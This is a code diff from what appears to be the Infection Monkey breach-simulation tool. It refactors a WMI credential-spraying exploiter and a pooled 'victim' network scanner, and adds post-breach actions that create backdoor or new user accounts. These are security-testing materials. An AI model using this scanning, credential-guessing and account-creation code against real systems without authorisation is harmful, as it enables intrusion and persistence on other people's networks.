payload = self.get_exploit_payload('/bin/sh', '-c', command)
|
payload = self.get_exploit_payload('/bin/sh', '-c', command)
|
||||||
|
|
|
@ -37,9 +37,10 @@ class WmiExploiter(HostExploiter):
|
||||||
|
|
||||||
for user, password, lm_hash, ntlm_hash in creds:
|
for user, password, lm_hash, ntlm_hash in creds:
|
||||||
password_hashed = self._config.hash_sensitive_data(password)
|
password_hashed = self._config.hash_sensitive_data(password)
|
||||||
LOG.debug("Attempting to connect %r using WMI with "
|
lm_hash_hashed = self._config.hash_sensitive_data(lm_hash)
|
||||||
"user,password (SHA-512),lm hash,ntlm hash: ('%s','%s','%s','%s')",
|
mtlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash)
|
||||||
self.host, user, password_hashed, lm_hash, ntlm_hash)
|
creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): ({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed)
|
||||||
|
LOG.debug(("Attempting to connect %r using WMI with " % self.host) + creds_for_logging)
|
||||||
|
|
||||||
wmi_connection = WmiTools.WmiConnection()
|
wmi_connection = WmiTools.WmiConnection()
|
||||||
|
|
||||||
|
@ -47,25 +48,21 @@ class WmiExploiter(HostExploiter):
|
||||||
wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash)
|
wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash)
|
||||||
except AccessDeniedException:
|
except AccessDeniedException:
|
||||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||||
LOG.debug("Failed connecting to %r using WMI with "
|
LOG.debug(("Failed connecting to %r using WMI with " % self.host) + creds_for_logging)
|
||||||
"user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
|
|
||||||
self.host, user, password_hashed, lm_hash, ntlm_hash)
|
|
||||||
continue
|
continue
|
||||||
except DCERPCException:
|
except DCERPCException:
|
||||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||||
LOG.debug("Failed connecting to %r using WMI with "
|
LOG.debug(("Failed connecting to %r using WMI with " % self.host) + creds_for_logging)
|
||||||
"user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
|
|
||||||
self.host, user, password_hashed, lm_hash, ntlm_hash)
|
|
||||||
continue
|
continue
|
||||||
except socket.error:
|
except socket.error:
|
||||||
LOG.debug("Network error in WMI connection to %r with "
|
LOG.debug(("Network error in WMI connection to %r with " % self.host) + creds_for_logging)
|
||||||
"user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
|
|
||||||
self.host, user, password_hashed, lm_hash, ntlm_hash)
|
|
||||||
return False
|
return False
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Unknown WMI connection error to %r with "
|
LOG.debug(
|
||||||
"user,password,lm hash,ntlm hash: ('%s','%s','%s','%s') (%s):\n%s",
|
("Unknown WMI connection error to %r with " % self.host)
|
||||||
self.host, user, password_hashed, lm_hash, ntlm_hash, exc, traceback.format_exc())
|
+ creds_for_logging
|
||||||
|
+ (" (%s):\n%s" % (exc, traceback.format_exc()))
|
||||||
|
)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
||||||
|
|
|
@ -7,8 +7,9 @@ import logging.config
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
import traceback
|
import traceback
|
||||||
|
from multiprocessing import freeze_support
|
||||||
|
|
||||||
import infection_monkey.utils as utils
|
from infection_monkey.utils.monkey_log_path import get_dropper_log_path, get_monkey_log_path
|
||||||
from infection_monkey.config import WormConfiguration, EXTERNAL_CONFIG_FILE
|
from infection_monkey.config import WormConfiguration, EXTERNAL_CONFIG_FILE
|
||||||
from infection_monkey.dropper import MonkeyDrops
|
from infection_monkey.dropper import MonkeyDrops
|
||||||
from infection_monkey.model import MONKEY_ARG, DROPPER_ARG
|
from infection_monkey.model import MONKEY_ARG, DROPPER_ARG
|
||||||
|
@ -43,7 +44,7 @@ def main():
|
||||||
|
|
||||||
if 2 > len(sys.argv):
|
if 2 > len(sys.argv):
|
||||||
return True
|
return True
|
||||||
|
freeze_support() # required for multiprocessing + pyinstaller on windows
|
||||||
monkey_mode = sys.argv[1]
|
monkey_mode = sys.argv[1]
|
||||||
|
|
||||||
if not (monkey_mode in [MONKEY_ARG, DROPPER_ARG]):
|
if not (monkey_mode in [MONKEY_ARG, DROPPER_ARG]):
|
||||||
|
@ -79,10 +80,10 @@ def main():
|
||||||
|
|
||||||
try:
|
try:
|
||||||
if MONKEY_ARG == monkey_mode:
|
if MONKEY_ARG == monkey_mode:
|
||||||
log_path = utils.get_monkey_log_path()
|
log_path = get_monkey_log_path()
|
||||||
monkey_cls = InfectionMonkey
|
monkey_cls = InfectionMonkey
|
||||||
elif DROPPER_ARG == monkey_mode:
|
elif DROPPER_ARG == monkey_mode:
|
||||||
log_path = utils.get_dropper_log_path()
|
log_path = get_dropper_log_path()
|
||||||
monkey_cls = MonkeyDrops
|
monkey_cls = MonkeyDrops
|
||||||
else:
|
else:
|
||||||
return True
|
return True
|
||||||
|
@ -127,8 +128,8 @@ def main():
|
||||||
json.dump(json_dict, config_fo, skipkeys=True, sort_keys=True, indent=4, separators=(',', ': '))
|
json.dump(json_dict, config_fo, skipkeys=True, sort_keys=True, indent=4, separators=(',', ': '))
|
||||||
|
|
||||||
return True
|
return True
|
||||||
except Exception:
|
except Exception as e:
|
||||||
LOG.exception("Exception thrown from monkey's start function")
|
LOG.exception("Exception thrown from monkey's start function. More info: {}".format(e))
|
||||||
finally:
|
finally:
|
||||||
monkey.cleanup()
|
monkey.cleanup()
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,45 @@
|
||||||
|
from infection_monkey.model.host import VictimHost
|
||||||
|
|
||||||
|
|
||||||
|
class VictimHostGenerator(object):
|
||||||
|
def __init__(self, network_ranges, blocked_ips, same_machine_ips):
|
||||||
|
self.blocked_ips = blocked_ips
|
||||||
|
self.ranges = network_ranges
|
||||||
|
self.local_addresses = same_machine_ips
|
||||||
|
|
||||||
|
def generate_victims(self, chunk_size):
|
||||||
|
"""
|
||||||
|
Generates VictimHosts in chunks from all the instances network ranges
|
||||||
|
:param chunk_size: Maximum size of each chunk
|
||||||
|
"""
|
||||||
|
chunk = []
|
||||||
|
for net_range in self.ranges:
|
||||||
|
for victim in self.generate_victims_from_range(net_range):
|
||||||
|
chunk.append(victim)
|
||||||
|
if len(chunk) == chunk_size:
|
||||||
|
yield chunk
|
||||||
|
chunk = []
|
||||||
|
if chunk: # finished with number of victims < chunk_size
|
||||||
|
yield chunk
|
||||||
|
|
||||||
|
def generate_victims_from_range(self, net_range):
|
||||||
|
"""
|
||||||
|
Generates VictimHosts from a given netrange
|
||||||
|
:param net_range: Network range object
|
||||||
|
:return: Generator of VictimHost objects
|
||||||
|
"""
|
||||||
|
for address in net_range:
|
||||||
|
if not self.is_ip_scannable(address): # check if the IP should be skipped
|
||||||
|
continue
|
||||||
|
if hasattr(net_range, 'domain_name'):
|
||||||
|
victim = VictimHost(address, net_range.domain_name)
|
||||||
|
else:
|
||||||
|
victim = VictimHost(address)
|
||||||
|
yield victim
|
||||||
|
|
||||||
|
def is_ip_scannable(self, ip_address):
|
||||||
|
if ip_address in self.local_addresses:
|
||||||
|
return False
|
||||||
|
if ip_address in self.blocked_ips:
|
||||||
|
return False
|
||||||
|
return True
|
|
@ -0,0 +1,46 @@
|
||||||
|
from unittest import TestCase
|
||||||
|
from infection_monkey.model.victim_host_generator import VictimHostGenerator
|
||||||
|
from common.network.network_range import CidrRange, SingleIpRange
|
||||||
|
|
||||||
|
|
||||||
|
class VictimHostGeneratorTester(TestCase):
|
||||||
|
|
||||||
|
def setUp(self):
|
||||||
|
self.cidr_range = CidrRange("10.0.0.0/28", False) # this gives us 15 hosts
|
||||||
|
self.local_host_range = SingleIpRange('localhost')
|
||||||
|
self.random_single_ip_range = SingleIpRange('41.50.13.37')
|
||||||
|
|
||||||
|
def test_chunking(self):
|
||||||
|
chunk_size = 3
|
||||||
|
# current test setup is 15+1+1-1 hosts
|
||||||
|
test_ranges = [self.cidr_range, self.local_host_range, self.random_single_ip_range]
|
||||||
|
generator = VictimHostGenerator(test_ranges, '10.0.0.1', [])
|
||||||
|
victims = generator.generate_victims(chunk_size)
|
||||||
|
for i in range(5): # quickly check the equally sided chunks
|
||||||
|
self.assertEqual(len(victims.next()), chunk_size)
|
||||||
|
victim_chunk_last = victims.next()
|
||||||
|
self.assertEqual(len(victim_chunk_last), 1)
|
||||||
|
|
||||||
|
def test_remove_blocked_ip(self):
|
||||||
|
generator = VictimHostGenerator(self.cidr_range, ['10.0.0.1'], [])
|
||||||
|
|
||||||
|
victims = list(generator.generate_victims_from_range(self.cidr_range))
|
||||||
|
self.assertEqual(len(victims), 14) # 15 minus the 1 we blocked
|
||||||
|
|
||||||
|
def test_remove_local_ips(self):
|
||||||
|
generator = VictimHostGenerator([], [], [])
|
||||||
|
generator.local_addresses = ['127.0.0.1']
|
||||||
|
victims = list(generator.generate_victims_from_range(self.local_host_range))
|
||||||
|
self.assertEqual(len(victims), 0) # block the local IP
|
||||||
|
|
||||||
|
def test_generate_domain_victim(self):
|
||||||
|
# domain name victim
|
||||||
|
generator = VictimHostGenerator([], [], []) # dummy object
|
||||||
|
victims = list(generator.generate_victims_from_range(self.local_host_range))
|
||||||
|
self.assertEqual(len(victims), 1)
|
||||||
|
self.assertEqual(victims[0].domain_name, 'localhost')
|
||||||
|
|
||||||
|
# don't generate for other victims
|
||||||
|
victims = list(generator.generate_victims_from_range(self.random_single_ip_range))
|
||||||
|
self.assertEqual(len(victims), 1)
|
||||||
|
self.assertEqual(victims[0].domain_name, '')
|
|
@ -7,7 +7,9 @@ import time
|
||||||
from six.moves import xrange
|
from six.moves import xrange
|
||||||
|
|
||||||
import infection_monkey.tunnel as tunnel
|
import infection_monkey.tunnel as tunnel
|
||||||
import infection_monkey.utils as utils
|
from infection_monkey.utils.environment import is_windows_os
|
||||||
|
from infection_monkey.utils.monkey_dir import create_monkey_dir, get_monkey_dir_path, remove_monkey_dir
|
||||||
|
from infection_monkey.utils.monkey_log_path import get_monkey_log_path
|
||||||
from infection_monkey.config import WormConfiguration
|
from infection_monkey.config import WormConfiguration
|
||||||
from infection_monkey.control import ControlClient
|
from infection_monkey.control import ControlClient
|
||||||
from infection_monkey.model import DELAY_DELETE_CMD
|
from infection_monkey.model import DELAY_DELETE_CMD
|
||||||
|
@ -24,9 +26,10 @@ from infection_monkey.telemetry.trace_telem import TraceTelem
|
||||||
from infection_monkey.telemetry.tunnel_telem import TunnelTelem
|
from infection_monkey.telemetry.tunnel_telem import TunnelTelem
|
||||||
from infection_monkey.windows_upgrader import WindowsUpgrader
|
from infection_monkey.windows_upgrader import WindowsUpgrader
|
||||||
from infection_monkey.post_breach.post_breach_handler import PostBreach
|
from infection_monkey.post_breach.post_breach_handler import PostBreach
|
||||||
from common.utils.attack_utils import ScanStatus
|
|
||||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||||
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
|
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
|
||||||
|
from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
|
||||||
|
from common.utils.attack_utils import ScanStatus, UsageEnum
|
||||||
|
|
||||||
__author__ = 'itamar'
|
__author__ = 'itamar'
|
||||||
|
|
||||||
|
@ -93,7 +96,7 @@ class InfectionMonkey(object):
|
||||||
fbts
|
fbts
|
||||||
|
|
||||||
# Create a dir for monkey files if there isn't one
|
# Create a dir for monkey files if there isn't one
|
||||||
utils.create_monkey_dir()
|
create_monkey_dir()
|
||||||
|
|
||||||
if WindowsUpgrader.should_upgrade():
|
if WindowsUpgrader.should_upgrade():
|
||||||
self._upgrading_to_64 = True
|
self._upgrading_to_64 = True
|
||||||
|
@ -105,6 +108,9 @@ class InfectionMonkey(object):
|
||||||
ControlClient.wakeup(parent=self._parent)
|
ControlClient.wakeup(parent=self._parent)
|
||||||
ControlClient.load_control_config()
|
ControlClient.load_control_config()
|
||||||
|
|
||||||
|
if is_windows_os():
|
||||||
|
T1106Telem(ScanStatus.USED, UsageEnum.SINGLETON_WINAPI).send()
|
||||||
|
|
||||||
if not WormConfiguration.alive:
|
if not WormConfiguration.alive:
|
||||||
LOG.info("Marked not alive from configuration")
|
LOG.info("Marked not alive from configuration")
|
||||||
return
|
return
|
||||||
|
@ -116,7 +122,7 @@ class InfectionMonkey(object):
|
||||||
if monkey_tunnel:
|
if monkey_tunnel:
|
||||||
monkey_tunnel.start()
|
monkey_tunnel.start()
|
||||||
|
|
||||||
StateTelem(False).send()
|
StateTelem(is_done=False).send()
|
||||||
TunnelTelem().send()
|
TunnelTelem().send()
|
||||||
|
|
||||||
if WormConfiguration.collect_system_info:
|
if WormConfiguration.collect_system_info:
|
||||||
|
@ -228,7 +234,7 @@ class InfectionMonkey(object):
|
||||||
InfectionMonkey.close_tunnel()
|
InfectionMonkey.close_tunnel()
|
||||||
firewall.close()
|
firewall.close()
|
||||||
else:
|
else:
|
||||||
StateTelem(True).send() # Signal the server (before closing the tunnel)
|
StateTelem(is_done=True).send() # Signal the server (before closing the tunnel)
|
||||||
InfectionMonkey.close_tunnel()
|
InfectionMonkey.close_tunnel()
|
||||||
firewall.close()
|
firewall.close()
|
||||||
if WormConfiguration.send_log_to_server:
|
if WormConfiguration.send_log_to_server:
|
||||||
|
@ -247,8 +253,8 @@ class InfectionMonkey(object):
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def self_delete():
|
def self_delete():
|
||||||
status = ScanStatus.USED if utils.remove_monkey_dir() else ScanStatus.SCANNED
|
status = ScanStatus.USED if remove_monkey_dir() else ScanStatus.SCANNED
|
||||||
T1107Telem(status, utils.get_monkey_dir_path()).send()
|
T1107Telem(status, get_monkey_dir_path()).send()
|
||||||
|
|
||||||
if WormConfiguration.self_delete_in_cleanup \
|
if WormConfiguration.self_delete_in_cleanup \
|
||||||
and -1 == sys.executable.find('python'):
|
and -1 == sys.executable.find('python'):
|
||||||
|
@ -272,7 +278,7 @@ class InfectionMonkey(object):
|
||||||
T1107Telem(status, sys.executable).send()
|
T1107Telem(status, sys.executable).send()
|
||||||
|
|
||||||
def send_log(self):
|
def send_log(self):
|
||||||
monkey_log_path = utils.get_monkey_log_path()
|
monkey_log_path = get_monkey_log_path()
|
||||||
if os.path.exists(monkey_log_path):
|
if os.path.exists(monkey_log_path):
|
||||||
with open(monkey_log_path, 'r') as f:
|
with open(monkey_log_path, 'r') as f:
|
||||||
log = f.read()
|
log = f.read()
|
||||||
|
|
|
@ -6,11 +6,11 @@ import requests
|
||||||
from requests.exceptions import Timeout, ConnectionError
|
from requests.exceptions import Timeout, ConnectionError
|
||||||
|
|
||||||
import infection_monkey.config
|
import infection_monkey.config
|
||||||
|
from common.data.network_consts import ES_SERVICE
|
||||||
from infection_monkey.model.host import VictimHost
|
from infection_monkey.model.host import VictimHost
|
||||||
from infection_monkey.network import HostFinger
|
from infection_monkey.network import HostFinger
|
||||||
|
|
||||||
ES_PORT = 9200
|
ES_PORT = 9200
|
||||||
ES_SERVICE = 'elastic-search-9200'
|
|
||||||
ES_HTTP_TIMEOUT = 5
|
ES_HTTP_TIMEOUT = 5
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
__author__ = 'danielg'
|
__author__ = 'danielg'
|
||||||
|
|
|
@ -1,28 +1,33 @@
|
||||||
import time
|
import time
|
||||||
|
import logging
|
||||||
|
|
||||||
from common.network.network_range import *
|
from common.network.network_range import NetworkRange
|
||||||
from infection_monkey.config import WormConfiguration
|
from infection_monkey.config import WormConfiguration
|
||||||
|
from infection_monkey.model.victim_host_generator import VictimHostGenerator
|
||||||
from infection_monkey.network.info import local_ips, get_interfaces_ranges
|
from infection_monkey.network.info import local_ips, get_interfaces_ranges
|
||||||
from infection_monkey.model import VictimHost
|
|
||||||
from infection_monkey.network import TcpScanner, PingScanner
|
from infection_monkey.network import TcpScanner, PingScanner
|
||||||
|
from infection_monkey.utils import is_windows_os
|
||||||
|
|
||||||
__author__ = 'itamar'
|
if is_windows_os():
|
||||||
|
from multiprocessing.dummy import Pool
|
||||||
|
else:
|
||||||
|
from multiprocessing import Pool
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
SCAN_DELAY = 0
|
ITERATION_BLOCK_SIZE = 5
|
||||||
|
|
||||||
|
|
||||||
class NetworkScanner(object):
|
class NetworkScanner(object):
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
self._ip_addresses = None
|
self._ip_addresses = None
|
||||||
self._ranges = None
|
self._ranges = None
|
||||||
|
self.scanners = [TcpScanner(), PingScanner()]
|
||||||
|
|
||||||
def initialize(self):
|
def initialize(self):
|
||||||
"""
|
"""
|
||||||
Set up scanning.
|
Set up scanning.
|
||||||
based on configuration: scans local network and/or scans fixed list of IPs/subnets.
|
based on configuration: scans local network and/or scans fixed list of IPs/subnets.
|
||||||
:return:
|
|
||||||
"""
|
"""
|
||||||
# get local ip addresses
|
# get local ip addresses
|
||||||
self._ip_addresses = local_ips()
|
self._ip_addresses = local_ips()
|
||||||
|
@ -68,49 +73,35 @@ class NetworkScanner(object):
|
||||||
:param stop_callback: A callback to check at any point if we should stop scanning
|
:param stop_callback: A callback to check at any point if we should stop scanning
|
||||||
:return: yields a sequence of VictimHost instances
|
:return: yields a sequence of VictimHost instances
|
||||||
"""
|
"""
|
||||||
|
# We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be the best decision
|
||||||
|
# However, the decision what ITERATION_BLOCK_SIZE also requires balancing network usage (pps and bw)
|
||||||
|
# Because we are using this to spread out IO heavy tasks, we can probably go a lot higher than CPU core size
|
||||||
|
# But again, balance
|
||||||
|
pool = Pool(ITERATION_BLOCK_SIZE)
|
||||||
|
victim_generator = VictimHostGenerator(self._ranges, WormConfiguration.blocked_ips, local_ips())
|
||||||
|
|
||||||
TCPscan = TcpScanner()
|
|
||||||
Pinger = PingScanner()
|
|
||||||
victims_count = 0
|
victims_count = 0
|
||||||
|
for victim_chunk in victim_generator.generate_victims(ITERATION_BLOCK_SIZE):
|
||||||
|
LOG.debug("Scanning for potential victims in chunk %r", victim_chunk)
|
||||||
|
|
||||||
for net_range in self._ranges:
|
# check before running scans
|
||||||
LOG.debug("Scanning for potential victims in the network %r", net_range)
|
if stop_callback and stop_callback():
|
||||||
for ip_addr in net_range:
|
LOG.debug("Got stop signal")
|
||||||
if hasattr(net_range, 'domain_name'):
|
return
|
||||||
victim = VictimHost(ip_addr, net_range.domain_name)
|
|
||||||
else:
|
|
||||||
victim = VictimHost(ip_addr)
|
|
||||||
if stop_callback and stop_callback():
|
|
||||||
LOG.debug("Got stop signal")
|
|
||||||
break
|
|
||||||
|
|
||||||
# skip self IP address
|
results = pool.map(self.scan_machine, victim_chunk)
|
||||||
if victim.ip_addr in self._ip_addresses:
|
resulting_victims = filter(lambda x: x is not None, results)
|
||||||
continue
|
for victim in resulting_victims:
|
||||||
|
LOG.debug("Found potential victim: %r", victim)
|
||||||
|
victims_count += 1
|
||||||
|
yield victim
|
||||||
|
|
||||||
# skip IPs marked as blocked
|
if victims_count >= max_find:
|
||||||
if victim.ip_addr in WormConfiguration.blocked_ips:
|
LOG.debug("Found max needed victims (%d), stopping scan", max_find)
|
||||||
LOG.info("Skipping %s due to blacklist" % victim)
|
return
|
||||||
continue
|
if WormConfiguration.tcp_scan_interval:
|
||||||
|
# time.sleep uses seconds, while config is in milliseconds
|
||||||
LOG.debug("Scanning %r...", victim)
|
time.sleep(WormConfiguration.tcp_scan_interval / float(1000))
|
||||||
pingAlive = Pinger.is_host_alive(victim)
|
|
||||||
tcpAlive = TCPscan.is_host_alive(victim)
|
|
||||||
|
|
||||||
# if scanner detect machine is up, add it to victims list
|
|
||||||
if pingAlive or tcpAlive:
|
|
||||||
LOG.debug("Found potential victim: %r", victim)
|
|
||||||
victims_count += 1
|
|
||||||
yield victim
|
|
||||||
|
|
||||||
if victims_count >= max_find:
|
|
||||||
LOG.debug("Found max needed victims (%d), stopping scan", max_find)
|
|
||||||
|
|
||||||
break
|
|
||||||
|
|
||||||
if WormConfiguration.tcp_scan_interval:
|
|
||||||
# time.sleep uses seconds, while config is in milliseconds
|
|
||||||
time.sleep(WormConfiguration.tcp_scan_interval/float(1000))
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _is_any_ip_in_subnet(ip_addresses, subnet_str):
|
def _is_any_ip_in_subnet(ip_addresses, subnet_str):
|
||||||
|
@ -119,5 +110,18 @@ class NetworkScanner(object):
|
||||||
return True
|
return True
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
def scan_machine(self, victim):
|
||||||
|
"""
|
||||||
|
Scans specific machine using instance scanners
|
||||||
|
:param victim: VictimHost machine
|
||||||
|
:return: Victim or None if victim isn't alive
|
||||||
|
"""
|
||||||
|
LOG.debug("Scanning target address: %r", victim)
|
||||||
|
if any([scanner.is_host_alive(victim) for scanner in self.scanners]):
|
||||||
|
LOG.debug("Found potential target_ip: %r", victim)
|
||||||
|
return victim
|
||||||
|
else:
|
||||||
|
return None
|
||||||
|
|
||||||
def on_island(self, server):
|
def on_island(self, server):
|
||||||
return bool([x for x in self._ip_addresses if x in server])
|
return bool([x for x in self._ip_addresses if x in server])
|
||||||
|
|
|
@ -10,7 +10,7 @@ import re
|
||||||
from six.moves import range
|
from six.moves import range
|
||||||
|
|
||||||
from infection_monkey.pyinstaller_utils import get_binary_file_path
|
from infection_monkey.pyinstaller_utils import get_binary_file_path
|
||||||
from infection_monkey.utils import is_64bit_python
|
from infection_monkey.utils.environment import is_64bit_python
|
||||||
|
|
||||||
DEFAULT_TIMEOUT = 10
|
DEFAULT_TIMEOUT = 10
|
||||||
BANNER_READ = 1024
|
BANNER_READ = 1024
|
||||||
|
|
|
@ -1,21 +1,16 @@
|
||||||
import datetime
|
from common.data.post_breach_consts import POST_BREACH_BACKDOOR_USER
|
||||||
from infection_monkey.post_breach.pba import PBA
|
from infection_monkey.post_breach.pba import PBA
|
||||||
from infection_monkey.config import WormConfiguration
|
from infection_monkey.config import WormConfiguration
|
||||||
|
from infection_monkey.utils.users import get_commands_to_add_user
|
||||||
|
|
||||||
__author__ = 'danielg'
|
|
||||||
|
|
||||||
LINUX_COMMANDS = ['useradd', '-M', '--expiredate',
|
|
||||||
datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
|
|
||||||
WormConfiguration.user_to_add]
|
|
||||||
|
|
||||||
WINDOWS_COMMANDS = ['net', 'user', WormConfiguration.user_to_add,
|
|
||||||
WormConfiguration.remote_user_pass,
|
|
||||||
'/add', '/ACTIVE:NO']
|
|
||||||
|
|
||||||
|
|
||||||
class BackdoorUser(PBA):
|
class BackdoorUser(PBA):
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
super(BackdoorUser, self).__init__("Backdoor user",
|
linux_cmds, windows_cmds = get_commands_to_add_user(
|
||||||
linux_cmd=' '.join(LINUX_COMMANDS),
|
WormConfiguration.user_to_add,
|
||||||
windows_cmd=WINDOWS_COMMANDS)
|
WormConfiguration.remote_user_pass)
|
||||||
|
super(BackdoorUser, self).__init__(
|
||||||
|
POST_BREACH_BACKDOOR_USER,
|
||||||
|
linux_cmd=' '.join(linux_cmds),
|
||||||
|
windows_cmd=windows_cmds)
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,143 @@
|
||||||
|
import logging
|
||||||
|
import os
|
||||||
|
import random
|
||||||
|
import string
|
||||||
|
import subprocess
|
||||||
|
import time
|
||||||
|
|
||||||
|
import win32event
|
||||||
|
|
||||||
|
from infection_monkey.utils.windows.auto_new_user import AutoNewUser, NewUserError
|
||||||
|
from common.data.post_breach_consts import POST_BREACH_COMMUNICATE_AS_NEW_USER
|
||||||
|
from infection_monkey.post_breach.pba import PBA
|
||||||
|
from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
|
||||||
|
from infection_monkey.utils.environment import is_windows_os
|
||||||
|
from infection_monkey.utils.linux.users import get_linux_commands_to_delete_user, get_linux_commands_to_add_user
|
||||||
|
|
||||||
|
PING_TEST_DOMAIN = "google.com"
|
||||||
|
|
||||||
|
PING_WAIT_TIMEOUT_IN_MILLISECONDS = 20 * 1000
|
||||||
|
|
||||||
|
CREATED_PROCESS_AS_USER_PING_SUCCESS_FORMAT = "Created process '{}' as user '{}', and successfully pinged."
|
||||||
|
CREATED_PROCESS_AS_USER_PING_FAILED_FORMAT = "Created process '{}' as user '{}', but failed to ping (exit status {})."
|
||||||
|
|
||||||
|
USERNAME = "somenewuser"
|
||||||
|
PASSWORD = "N3WPa55W0rD!1"
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class CommunicateAsNewUser(PBA):
|
||||||
|
"""
|
||||||
|
This PBA creates a new user, and then pings google as that user. This is used for a Zero Trust test of the People
|
||||||
|
pillar. See the relevant telemetry processing to see what findings are created.
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
super(CommunicateAsNewUser, self).__init__(name=POST_BREACH_COMMUNICATE_AS_NEW_USER)
|
||||||
|
|
||||||
|
def run(self):
|
||||||
|
username = CommunicateAsNewUser.get_random_new_user_name()
|
||||||
|
if is_windows_os():
|
||||||
|
self.communicate_as_new_user_windows(username)
|
||||||
|
else:
|
||||||
|
self.communicate_as_new_user_linux(username)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_random_new_user_name():
|
||||||
|
return USERNAME + ''.join(random.choice(string.ascii_lowercase) for _ in range(5))
|
||||||
|
|
||||||
|
def communicate_as_new_user_linux(self, username):
|
||||||
|
try:
|
||||||
|
# add user + ping
|
||||||
|
linux_cmds = get_linux_commands_to_add_user(username)
|
||||||
|
commandline = "ping -c 1 {}".format(PING_TEST_DOMAIN)
|
||||||
|
linux_cmds.extend([";", "sudo", "-u", username, commandline])
|
||||||
|
final_command = ' '.join(linux_cmds)
|
||||||
|
exit_status = os.system(final_command)
|
||||||
|
self.send_ping_result_telemetry(exit_status, commandline, username)
|
||||||
|
# delete the user, async in case it gets stuck.
|
||||||
|
_ = subprocess.Popen(
|
||||||
|
get_linux_commands_to_delete_user(username), stderr=subprocess.STDOUT, shell=True)
|
||||||
|
# Leaking the process on purpose - nothing we can do if it's stuck.
|
||||||
|
except subprocess.CalledProcessError as e:
|
||||||
|
PostBreachTelem(self, (e.output, False)).send()
|
||||||
|
|
||||||
|
def communicate_as_new_user_windows(self, username):
|
||||||
|
# Importing these only on windows, as they won't exist on linux.
|
||||||
|
import win32con
|
||||||
|
import win32process
|
||||||
|
import win32api
|
||||||
|
|
||||||
|
try:
|
||||||
|
with AutoNewUser(username, PASSWORD) as new_user:
|
||||||
|
# Using os.path is OK, as this is on windows for sure
|
||||||
|
ping_app_path = os.path.join(os.environ["WINDIR"], "system32", "PING.exe")
|
||||||
|
if not os.path.exists(ping_app_path):
|
||||||
|
PostBreachTelem(self, ("{} not found.".format(ping_app_path), False)).send()
|
||||||
|
return # Can't continue without ping.
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Open process as that user:
|
||||||
|
# https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessasusera
|
||||||
|
commandline = "{} {} {} {}".format(ping_app_path, PING_TEST_DOMAIN, "-n", "1")
|
||||||
|
process_handle, thread_handle, _, _ = win32process.CreateProcessAsUser(
|
||||||
|
new_user.get_logon_handle(), # A handle to the primary token that represents a user.
|
||||||
|
None, # The name of the module to be executed.
|
||||||
|
commandline, # The command line to be executed.
|
||||||
|
None, # Process attributes
|
||||||
|
None, # Thread attributes
|
||||||
|
True, # Should inherit handles
|
||||||
|
win32con.NORMAL_PRIORITY_CLASS, # The priority class and the creation of the process.
|
||||||
|
None, # An environment block for the new process. If this parameter is NULL, the new process
|
||||||
|
# uses the environment of the calling process.
|
||||||
|
None, # CWD. If this parameter is NULL, the new process will have the same current drive and
|
||||||
|
# directory as the calling process.
|
||||||
|
win32process.STARTUPINFO() # STARTUPINFO structure.
|
||||||
|
# https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-startupinfoa
|
||||||
|
)
|
||||||
|
|
||||||
|
logger.debug(
|
||||||
|
"Waiting for ping process to finish. Timeout: {}ms".format(PING_WAIT_TIMEOUT_IN_MILLISECONDS))
|
||||||
|
|
||||||
|
# Ignoring return code, as we'll use `GetExitCode` to determine the state of the process later.
|
||||||
|
_ = win32event.WaitForSingleObject( # Waits until the specified object is signaled, or time-out.
|
||||||
|
process_handle, # Ping process handle
|
||||||
|
PING_WAIT_TIMEOUT_IN_MILLISECONDS # Timeout in milliseconds
|
||||||
|
)
|
||||||
|
|
||||||
|
ping_exit_code = win32process.GetExitCodeProcess(process_handle)
|
||||||
|
|
||||||
|
self.send_ping_result_telemetry(ping_exit_code, commandline, username)
|
||||||
|
except Exception as e:
|
||||||
|
# If failed on 1314, it's possible to try to elevate the rights of the current user with the
|
||||||
|
# "Replace a process level token" right, using Local Security Policy editing.
|
||||||
|
PostBreachTelem(self, (
|
||||||
|
